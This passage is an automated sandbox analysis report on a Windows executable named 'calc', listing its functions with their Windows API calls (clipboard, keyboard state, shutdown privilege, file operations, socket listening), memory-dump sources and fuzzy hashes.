    Function 0042A322 Relevance: 31.7, APIs: 21, Instructions: 165clipboardfileCOMMON
    Download Yara Rule
    APIs
    • OpenClipboard.USER32(0045C6D0), ref: 0042A34E
    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0042A35C
    • GetClipboardData.USER32(0000000D), ref: 0042A364
    • CloseClipboard.USER32 ref: 0042A370
      • Part of subcall function 0041684E: _strlen.LIBCMT ref: 0041685F
      • Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416879
      • Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416898
    • GlobalLock.KERNEL32(00000000), ref: 0042A37D
    • GlobalUnlock.KERNEL32(00000000), ref: 0042A38E
    • IsClipboardFormatAvailable.USER32(00000001), ref: 0042A39B
    • GetClipboardData.USER32(00000001), ref: 0042A3A3
    • GlobalLock.KERNEL32(00000000), ref: 0042A3B0
    • CloseClipboard.USER32 ref: 0042A3BA
    • IsClipboardFormatAvailable.USER32(0000000F), ref: 0042A3E5
    • GetClipboardData.USER32(0000000F), ref: 0042A3F1
    • CloseClipboard.USER32 ref: 0042A3FF
    • GlobalLock.KERNEL32(00000000), ref: 0042A40B
    • CloseClipboard.USER32 ref: 0042A415
    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0042A437
    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0042A455
    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0042A48A
    • GlobalUnlock.KERNEL32(00000000), ref: 0042A4AA
    • CountClipboardFormats.USER32 ref: 0042A4BF
    • CloseClipboard.USER32 ref: 0042A4DA
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Clipboard$CloseGlobal$AvailableDataDragFileFormatLockQuery$ByteCharMultiUnlockWide$CountFormatsOpen_strlen
    • String ID:
    • API String ID: 2574986921-0
    • Opcode ID: e56d2ab591dfa9fcdb9d967861455157af0d1e7ec68dd1e187dfc22f0363e9fc
    • Instruction ID: 2cdc2f06eb618e585f5a6265f66a70c7a1ebf7fce3b87c4d366946daf1d9761b
    • Opcode Fuzzy Hash: e56d2ab591dfa9fcdb9d967861455157af0d1e7ec68dd1e187dfc22f0363e9fc
    • Instruction Fuzzy Hash: E351B335704225FBDB10BBB0AC49BEF3768AF04716F500167FD02E61D2DA78DE518A6A
    Function 00415C2E Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 64shutdownCOMMON
    Download Yara Rule
    APIs
    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C47
    • OpenProcessToken.ADVAPI32(00000000), ref: 00415C4E
    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415C64
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415C83
    • GetLastError.KERNEL32 ref: 00415C89
    • EnumWindows.USER32(00415CDD,00000000), ref: 00415CB0
    • ExitWindowsEx.USER32(?,00000000), ref: 00415CC2
    • SetSystemPowerState.KERNEL32(00000000,00000000), ref: 00415CD4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ProcessTokenWindows$AdjustCurrentEnumErrorExitLastLookupOpenPowerPrivilegePrivilegesStateSystemValue
    • String ID: $ $@$SeShutdownPrivilege
    • API String ID: 3737638738-3163812486
    • Opcode ID: ea0fbbeac291180e333a6a094d9918e1e1657e0eb019d4086f517d0bf663a25b
    • Instruction ID: 49d841cba545c5e070391086715d3aefc5c408c91397dada84c5bad0ac2ab89b
    • Opcode Fuzzy Hash: ea0fbbeac291180e333a6a094d9918e1e1657e0eb019d4086f517d0bf663a25b
    • Instruction Fuzzy Hash: 9911C171501724FAEB209FA49D8CBEB7EAC9B45382F140462F806D1191E3688DC0C6ED
    Function 0043A442 Relevance: 20.5, Strings: 16, Instructions: 542COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID:
    • String ID: byte$char$double$dword$float$hwnd$int$int64$long$ptr$short$ubyte$udword$uint$uint64$ushort
    • API String ID: 0-2529698504
    • Opcode ID: b7a9b3e30103e45e66b2d1ce2d3238477806f519137c5353d2a34471e6ab73ad
    • Instruction ID: 408187dce4e3af08b5b89b5e17c97d7132e6516c7f25d87d376e3bda80f24d10
    • Opcode Fuzzy Hash: b7a9b3e30103e45e66b2d1ce2d3238477806f519137c5353d2a34471e6ab73ad
    • Instruction Fuzzy Hash: 9502C131D40614ABDB21EF6988417DFB7B1FF09314F1044AFE949BB241D7B89E858B8A
    Function 004527E8 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 212timeCOMMON
    Download Yara Rule
    APIs
    • __lock.LIBCMT ref: 004527FB
      • Part of subcall function 0044C6DB: RtlEnterCriticalSection.KERNEL32(?,?,?,00449CAB,00000004,0045B078,0000000C,0044C5F4,00000000,?,0044C583,?,0045B1B8,00000060), ref: 0044C703
    • _strlen.LIBCMT ref: 0045286D
    • _strcat.LIBCMT ref: 0045288A
    • _strncpy.LIBCMT ref: 004528A3
      • Part of subcall function 00449C88: __lock.LIBCMT ref: 00449CA6
      • Part of subcall function 00449C88: RtlFreeHeap.NTDLL(00000000,?,0045B078,0000000C,0044C5F4,00000000,?,0044C583,?,0045B1B8,00000060), ref: 00449CED
    • GetTimeZoneInformation.KERNEL32(004675A8,0045BBD8,00000018,00452DFD,0045BBE8,00000008,0044BA23,00000000,?,00436C4F,?,?,00000002,?,00000000), ref: 0045290C
    • WideCharToMultiByte.KERNEL32(00000000,00000000,004675AC,000000FF,0000003F,00000000,?,?,00436C4F,?,?,00000002,?,00000000), ref: 0045299A
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00467600,000000FF,0000003F,00000000,?,?,00436C4F,?,?,00000002,?,00000000), ref: 004529CE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strcat_strlen_strncpy
    • String ID: 0\F$p\F
    • API String ID: 3757401926-1809889677
    • Opcode ID: 7be7ea9dbf762c7d163cfbf82d8abffe9cea1f53f3681dfd7b0445f9d39d0464
    • Instruction ID: d2ea11773b2d3be43936d7844425afaec6d5ad34900df3f8f7bdcc1512a1afa4
    • Opcode Fuzzy Hash: 7be7ea9dbf762c7d163cfbf82d8abffe9cea1f53f3681dfd7b0445f9d39d0464
    • Instruction Fuzzy Hash: E2711A71904B409ED7259F28EE41B567BE5A716325F64022FE880973A2E7F84C46CB1E
    Function 0041510D Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163filestringCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00414E6E: GetFullPathNameW.KERNEL32(00000000,00000104,00479BFC,00000000,00479BFC,0047BD30,?,0040FF5E,00479BFC,00000000), ref: 00414E89
      • Part of subcall function 00414E55: GetFileAttributesW.KERNEL32(?,00414BDE,?), ref: 00414E59
    • FindFirstFileW.KERNEL32(?,?), ref: 004151D3
    • lstrcmpiW.KERNEL32(?,?), ref: 00415293
    • DeleteFileW.KERNEL32(?), ref: 004152A0
    • MoveFileW.KERNEL32(?,?), ref: 004152BC
    • FindNextFileW.KERNEL32(?,00000010), ref: 004152D0
    • CopyFileW.KERNEL32(?,?,00000000), ref: 004152F0
    • DeleteFileW.KERNEL32(?), ref: 004152FD
    • CopyFileW.KERNEL32(?,?,00000000), ref: 0041530B
    • FindClose.KERNEL32(?), ref: 00415319
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: File$Find$CopyDelete$AttributesCloseFirstFullMoveNameNextPathlstrcmpi
    • String ID: \*.*
    • API String ID: 2474323978-1173974218
    • Opcode ID: 4f15818cb1126c28666f23ab2e76e3e64d56387ec87a981252ee79d9fb4a6572
    • Instruction ID: aacaddc1c19b48135d35dab2b4c22e42f007f3cfacbae92258d2fd995ae47f3c
    • Opcode Fuzzy Hash: 4f15818cb1126c28666f23ab2e76e3e64d56387ec87a981252ee79d9fb4a6572
    • Instruction Fuzzy Hash: F1512CB290066DEADF21EAA1CC48FCF77BCAF45354F0041D7E509E2141EA799AC8CB65
    Function 00424856 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 112fileCOMMON
    Download Yara Rule
    APIs
    • GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00424874
    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00000000), ref: 004248E8
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,00000000), ref: 0042490E
    • RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042491E
    • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 004249AB
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004249B6
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004249C1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
    • String ID: :$\$\??\%s
    • API String ID: 3827137101-3457252023
    • Opcode ID: 9ba5ce9e1dfb69b3bc8aa7bfa2ae6ab5b9102d51547e5d3911f31f0c523eb3de
    • Instruction ID: 490b265d1c1b8bc703676836a20bc5cd6847e60d43ef2fc6bf4678178061e1e6
    • Opcode Fuzzy Hash: 9ba5ce9e1dfb69b3bc8aa7bfa2ae6ab5b9102d51547e5d3911f31f0c523eb3de
    • Instruction Fuzzy Hash: 0941A6B650022CAADB10AF64DC49EDB37BCEF48314F5041A6F919D2152DB34DF849BA9
    Function 0041111C Relevance: 16.6, APIs: 11, Instructions: 111keyboardCOMMON
    Download Yara Rule
    APIs
    • GetKeyboardState.USER32(?), ref: 00411140
    • GetAsyncKeyState.USER32(00000011), ref: 004111D3
    • GetKeyState.USER32(00000011), ref: 004111E7
    • GetAsyncKeyState.USER32(00000012), ref: 00411201
    • GetKeyState.USER32(00000012), ref: 0041120A
    • GetAsyncKeyState.USER32(000000A0), ref: 00411225
    • GetKeyState.USER32(000000A0), ref: 0041122D
    • GetAsyncKeyState.USER32(000000A1), ref: 0041124F
    • GetKeyState.USER32(000000A1), ref: 00411257
    • GetAsyncKeyState.USER32(0000005B), ref: 00411275
    • GetKeyState.USER32(0000005B), ref: 0041127E
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: State$Async$Keyboard
    • String ID:
    • API String ID: 541375521-0
    • Opcode ID: c338db2ebfc7b81165dcb8171b49bc99007ff0eb5cf1a9d99d3063b8f188d27e
    • Instruction ID: e31dbba070b44f53dd3458c3638453cf18232ab5b47055628d4a6071834e1978
    • Opcode Fuzzy Hash: c338db2ebfc7b81165dcb8171b49bc99007ff0eb5cf1a9d99d3063b8f188d27e
    • Instruction Fuzzy Hash: C241C4341093CD6AEB34DB648949BEBBBD49F55704F04045EDF8D533A2C3788D88976A
    Function 00420D89 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 516sleepCOMMON
    Download Yara Rule
    APIs
    • InterlockedIncrement.KERNEL32(004783F4), ref: 00420E10
    • InterlockedDecrement.KERNEL32(004783F4), ref: 00420E21
    • Sleep.KERNEL32(0000000A), ref: 00420E29
    • InterlockedIncrement.KERNEL32(004783F4), ref: 00420E30
      • Part of subcall function 0041FAEE: LoadStringW.USER32(00000066,?,00000FFF,00479E08), ref: 0041FB43
      • Part of subcall function 0041FAEE: LoadStringW.USER32(0047BD30,?,00000FFF), ref: 0041FB56
    • InterlockedDecrement.KERNEL32(004783F4), ref: 00420F37
    • CharUpperBuffW.USER32(?,?), ref: 00420F75
    • InterlockedDecrement.KERNEL32(004783F4), ref: 0042104E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Interlocked$Decrement$IncrementLoadString$BuffCharSleepUpper
    • String ID: @COM_EVENTOBJ
    • API String ID: 934844991-2228938565
    • Opcode ID: fdf7677aa1cd11b3bb1a666ba3416739045066248821304faf1342584a254010
    • Instruction ID: 6ea2b9a6e17d07e1c07b5102837ec04bf299e60735082e7939a45b08f099e3a8
    • Opcode Fuzzy Hash: fdf7677aa1cd11b3bb1a666ba3416739045066248821304faf1342584a254010
    • Instruction Fuzzy Hash: 6E229A31A00269DFCB24DF64D881AED37B5FF14304F50816EF915A7262DB38A986CB98
    Function 00422C4D Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 210timefileCOMMON
    Download Yara Rule
    APIs
    • FindFirstFileW.KERNEL32(00000000,?), ref: 00422C7F
    • FindClose.KERNEL32(00000000), ref: 00422CC5
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00422CF1
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00422D05
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00422D27
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: FileTime$FindLocal$CloseFirstSystem
    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
    • API String ID: 3238362701-2428617273
    • Opcode ID: 71ca0f3d555a88e38985b6a51d8b0467d04d6e91d46064fc809aa1ba1af80b67
    • Instruction ID: b5dcbf70462fbe47fe172edd752ae1c2a7306ae79658aad27f2e11ace563c1bf
    • Opcode Fuzzy Hash: 71ca0f3d555a88e38985b6a51d8b0467d04d6e91d46064fc809aa1ba1af80b67
    • Instruction Fuzzy Hash: B47138B2900119ABCB10EBE5D8859EEB3BCAF08314F50415BF915E7241DB78EE458BA8
    Function 004230D5 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107fileCOMMON
    Download Yara Rule
    APIs
    • FindFirstFileW.KERNEL32(00000000,?,74DE8FB0,?,00000000), ref: 004230F3
    • FindNextFileW.KERNEL32(00000000,?), ref: 0042314B
    • FindClose.KERNEL32(00000000), ref: 00423156
    • FindFirstFileW.KERNEL32(*.*,?), ref: 0042317C
    • SetCurrentDirectoryW.KERNEL32(?), ref: 004231C9
    • SetCurrentDirectoryW.KERNEL32(004604D0), ref: 004231E7
    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004231F1
    • FindClose.KERNEL32(00000000), ref: 004231FE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Find$File$CloseCurrentDirectoryFirstNext
    • String ID: *.*
    • API String ID: 1688175871-438819550
    • Opcode ID: dfc8a14a01940d425b0f09de917f9ee571f79e67c6d34d5baa6881ff1d2ea7f7
    • Instruction ID: 29861fd0da0d17a13f764a0acb193fcdcc356ff7de37d4c9d30fbf1bb77053e7
    • Opcode Fuzzy Hash: dfc8a14a01940d425b0f09de917f9ee571f79e67c6d34d5baa6881ff1d2ea7f7
    • Instruction Fuzzy Hash: 5631A9316002297ADF209FA0BD49FFB37BCAF44316F540097F90492181EB7DDE159A18
    Function 0041605B Relevance: 12.1, APIs: 8, Instructions: 92COMMON
    Download Yara Rule
    APIs
    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004160AD
    • LoadResource.KERNEL32(?,00000000), ref: 004160B9
    • LockResource.KERNEL32(00000000), ref: 004160BC
    • FindResourceW.KERNEL32(?,?,00000003), ref: 004160E1
    • LoadResource.KERNEL32(?,00000000), ref: 004160EA
    • SizeofResource.KERNEL32(?,?), ref: 004160F5
    • LockResource.KERNEL32(00000000), ref: 00416101
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Resource$FindLoadLock$Sizeof
    • String ID:
    • API String ID: 4215241788-0
    • Opcode ID: 2afbcbb99dc1360dcbc8960ad73a9b6ad2de71b7916da34e34b9c8847100ea38
    • Instruction ID: ad861e728714f87d0bd08c3f0af146d5d0e55425d81be2c55b6ca67d22e84554
    • Opcode Fuzzy Hash: 2afbcbb99dc1360dcbc8960ad73a9b6ad2de71b7916da34e34b9c8847100ea38
    • Instruction Fuzzy Hash: F7318B71800219AFEF10DFA0DD48AAF7BBAEB04305F004426F905A2261E375DE60DB69
    Function 0042A4F2 Relevance: 10.6, APIs: 7, Instructions: 54clipboardmemoryCOMMON
    Download Yara Rule
    APIs
    • GlobalAlloc.KERNEL32(00000002,?), ref: 0042A524
    • GlobalLock.KERNEL32(00000000), ref: 0042A531
    • GlobalUnlock.KERNEL32(00000000), ref: 0042A560
    • OpenClipboard.USER32 ref: 0042A56C
    • EmptyClipboard.USER32 ref: 0042A572
    • SetClipboardData.USER32(0000000D,00000000), ref: 0042A57B
    • CloseClipboard.USER32 ref: 0042A581
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
    • String ID:
    • API String ID: 1677084743-0
    • Opcode ID: 93e8dff324ad49c5c636a0e62d9c868207c320c502e4846e6e22dcfcb3b84a3d
    • Instruction ID: 6cccff68164277771eb89f088960f801e9b52451248a8bbc4c77ee29cd5c4e6e
    • Opcode Fuzzy Hash: 93e8dff324ad49c5c636a0e62d9c868207c320c502e4846e6e22dcfcb3b84a3d
    • Instruction Fuzzy Hash: 7401C432104220FFD710BB61EC0DE6F3768AF45726F45046AF80597162DB28CC86CB6A
    Function 0042F3BC Relevance: 9.1, APIs: 6, Instructions: 77networkCOMMON
    Download Yara Rule
    APIs
    • socket.WSOCK32(00000002,00000001,00000006,?,00000000,00000000), ref: 0042F428
    • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000,00000000), ref: 0042F436
    • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000,00000000), ref: 0042F44E
    • listen.WSOCK32(00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000,00000000), ref: 0042F45C
    • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000,00000000), ref: 0042F46A
    • closesocket.WSOCK32(00000000,00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000,00000000), ref: 0042F47A
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ErrorLast$bindclosesocketlistensocket
    • String ID:
    • API String ID: 1279440585-0
    • Opcode ID: 23d60ec8938c12dcff92dea0958b30484043bd5e484a518ab48403b1d2719e68
    • Instruction ID: 28023dcdb2f292c3a4eb683a391c007bd58f3907a0e68a2917aa8acad0e77ec9
    • Opcode Fuzzy Hash: 23d60ec8938c12dcff92dea0958b30484043bd5e484a518ab48403b1d2719e68
    • Instruction Fuzzy Hash: E1219730700224ABDB10FB65DC42E9F73B5AF10328F90417FF955A7292D778AE458699
    Function 00426292 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120filesleepCOMMON
    Download Yara Rule
    APIs
    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000001), ref: 004262D4
    • Sleep.KERNEL32(0000000A,00000000), ref: 00426302
    • FindNextFileW.KERNEL32(?,?,00000000), ref: 004263DC
    • FindClose.KERNEL32(?), ref: 004263F4
    Strings
    Memory Dump Source
